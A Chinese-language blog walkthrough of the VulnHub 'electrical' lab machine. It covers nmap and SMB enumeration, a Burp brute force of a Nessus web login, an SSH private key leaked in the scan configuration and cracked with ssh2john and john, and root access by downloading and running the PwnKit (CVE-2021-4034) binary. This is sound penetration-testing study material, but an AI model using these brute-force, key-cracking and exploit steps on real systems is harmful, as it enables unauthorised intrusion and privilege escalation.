打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机

2025-03-17 4 0

前言

靶机:digitalworld.local-electrical,IP地址为192.168.10.12,后期因为卡顿,重新安装,ip地址后面为192.168.10.11

攻击:kali,IP地址为192.168.10.6

kali采用VMware虚拟机,靶机选择使用VMware打开文件,都选择桥接网络

这里官方给的有两种方式,一是直接使用virtualbox加载,另一种是通过VMware直接加载,也给出了iso镜像文件。

文章中涉及的靶机,来源于vulnhub官网,想要下载,可自行访问官网下载,或者通过网盘下载https://pan.quark.cn/s/86cf8a398835

主机发现

使用arp-scan -lnetdiscover -r 192.168.10.1/24扫描

也可以使用nmap等工具进行

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图

信息收集

使用nmap扫描端口

扫描tcp端口,并保存于nmap-tcp

nmap -sT 192.168.10.12 --min-rate=1000 -p- -oA nmap-tcp

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图1

扫描常见的20个udp端口,不过这里的端口大部分都是不确定的情况

nmap -sU 192.168.10.12 --top-ports 20 -T4 -oA nmap-udp

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图2

把前面扫描出的tcp、udp端口,进行处理,只取端口号

grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','
#这里就是包括可能开放的端口都不要,因为是靶机,可能过滤的话,也会无法进一步扫描
ports=22,80,8080,68,69,138,161,631,1434,1900

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图3

对特定的端口号进行深入探测

nmap -sV -O -sC -sT 192.168.10.12 -p $ports -oA detail

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图4

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图5

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图6

使用脚本检测有无漏洞

nmap --script=vuln 192.168.10.12 -p $ports -oA vuln

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图7

SMB探测

使用enum4linux尝试进行枚举,发现两个分享print$IPC$,并还有两个用户govindasamyelectrical

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图8

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图9

8834端口探测

这里需要注意,使用浏览器访问时需要加上https协议

https://192.168.10.12:8834

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图10

查看页面源代码也没有信息泄露,那么尝试识别一下,使用whatweb测试

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图11

再使用浏览器插件wappalyzer识别

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图12

尝试进行目录爆破,可以使用dirbdirsearch进行测试

dirsearch -u https://192.168.10.12:8834 -x 403,404 -e js,txt,zip,bak,cfm,dbm

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图13

发现有api,访问之后,发现有很多功能

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图14

测试这些api功能后,基本上都是需要登录的,无意义

网站密码爆破

尝试进行抓取数据包然后爆破,以前面两个用户名为测试,我这里是使用burp

选择攻击点、攻击模式、以及字典的选择

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图15

这里的默认字典,只有burp pro版本中有,若使用社区版,可以加载密码字典,比如加载kali中的/usr/share/wordlists/fasttrack.txt字典或rockyou.txt也行

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图16

开始攻击后,等一会即可发现成功获取一个,用户名govindasamy和弱密码password

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图17

敏感信息泄露

下面的靶机因为重装,ip地址更改为192.168.10.11

输入密码进行登录,登录后发现是nessus的漏洞扫描的web界面,之前也搜索过对应版本的nessus漏洞,发现并没有可利用的,那么在这个web ui界面进行探测。

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图18

这里建议使用burp抓取全程的数据包

在测试scan中的credentialed check时,点击其配置configuration,发现一个文本域,向下居然有内容,并且还是某一个的私钥,这个可能是靶机上的,也只是可能,需要进一步测试

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图19

把这个内容复制并保存在kali中的一个文件中

并且在配置中,默认的账户就是electrical

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图20

尝试进行登录可以明显的看到,对私钥进行了加密操作

chmod 600 id1
ssh electrical@192.168.10.11 -p 22222 -i id1

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图21

这里先使用john进行破解测试

ssh2john id1 > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图22

可以看到密码就是用户名,啧,之前好像在哪里看到过,好像在burp抓包的时候与发现ssh私钥的同一界面,不过无所谓了

靶机内信息收集

使用ssh进行登录

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图23

查看local.txt文件

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图24

查看当前靶机内有哪些用户

ls -al /home
cat /etc/passwd | grep /bin/bash

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图25

查看网络状态连接

ss -antulp
netstat -antulp

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图26

查看ip地址状态

ip add

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图27

查看系统进程

ps aux | grep root
top

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图28

使用find寻找具有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图29

发现有sudo,但是这里不知道electrical的密码,测试后,发现果然需要密码,所以暂时搁置

查看内核版本及系统版本

uname -a
uname -r 
cat /etc/issue
cat /etc/*release
lsb_release

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图30

查看定时任务

crontab -l
cat /etc/crontab
atq

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图31

注意,下面的脚本上传,都是我个人kali的路径,所以要自行更改的,并且下面的脚本都是在github上的项目,可自行去搜索下载。当然为了自己方便,我会放置在自己的网盘中的

通过scp上传pspy64检测是否有隐藏的任务

#在kali上执行该命令,通过scp传输
scp -P 22222 -i ../digital/electrical/id1 pspy64 electrical@192.168.10.11:/tmp

不过在靶机上执行pspy64后,并未有什么发现

那么再上传一个脚本linpeas.sh,用于检测

#在kali上执行该命令,通过scp传输
scp -P 22222 -i ../digital/electrical/id1 linpeas.sh electrical@192.168.10.11:/tmp

检测后,也是没有任何收获,不过还是看到一些东西,如第三方工具gcc等,并没有安装,也就表示无法在靶机内编译文件,也看到了可能存在的漏洞

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图32

提权

之前经过使用find寻找具有SUID权限文件时,发现有/usr/libexec/polkit-agent-helper-1/usr/bin/pkexec,结合前面的pwnkit漏洞的发现,也就是CVE-2021-4034,猜测也许可以利用

通过AI搜索,以下为内容

CVE-2021-4034(PwnKit)漏洞:

​ 主要利用了具有 SUID 权限的 /usr/bin/pkexec文件来实现提权

pkexec是 PolicyKit 提供的一个工具,用于以特权用户(通常是 root)身份执行命令。

PolicyKit是一个用于在 Linux 系统上管理特权操作的框架,pkexec本身被设计为一个安全机制,用于在用户请求执行特权操作时进行权限验证。

然而,CVE - 2021 - 4034 漏洞的存在使得攻击者可以绕过 pkexec的权限验证机制。该漏洞是由于 pkexec在处理环境变量时存在缓冲区溢出漏洞,攻击者可以构造恶意的环境变量,使得 pkexec在执行过程中出现内存错误,从而改变程序的执行流程,最终以 root权限执行任意命令。

下面是github中的一些poc,因为这里无法直接在靶机编译,所以使用编译好的文件,github项目地址为https://github.com/ly4k/PwnKit

采用这个编译好的

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图33

首先下载到kali中,然后通过scp下载到靶机内

#下载
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit

#传输
scp -P 22222 -i /id1 PwnKit electrical@192.168.10.11:/tmp

然后在靶机上加上执行权限后直接执行

chmod +x PwnKit
./PwnKit

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图34

提权成功,查看/root目录下的文件

打靶记录—vulnhub靶场之【digital world.local系列】的electrical靶机插图35

总结

该靶机的考察如下:

  1. 对于不存在漏洞的网站,并且需要登录才能看到内容,而且不支持注册的网站,或许爆破是最好的手段了,这里的爆破不仅仅包括密码爆破

  2. 存在smb服务的,都可以枚举一下用户,这个会有用处的

  3. 对于网站中的信息,也就是每一个模块,最好就是通过burp抓取数据包,至少要有历史记录,这样复盘很轻松。且网站中可能存在的隐藏信息,不一定通过页面源代码就能看到,建议使用浏览器的开发者工具,这里就是通过发现了一个私钥文件,才有下一步的

  4. ssh的私钥文件,对于设置密码的,可以通过john套件进行处理,ssh2john转换,john破解

  5. 对于提权,这里借助的是几个脚本pspy64、linpeas.sh发现的,当然还是配合find寻找到的SUID权限文件结合起来的。

  6. 考察pwnkit提权,也就是cve-2021-4034,这个可以通过github下载


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

信息收集-基础 | 端口扫描-WAF识别-蜜罐识别技术
API安全|深度解析与AI赋能攻防实践
某Java电商系统代码审计
Java代码审计 | 某电商系统 漏洞分析
生成式AI红队测试:如何有效评估大语言模型 | CSO在线
新型MassJacker剪贴板恶意软件,捆绑在盗版软件中偷窃加密货币钱包

发布评论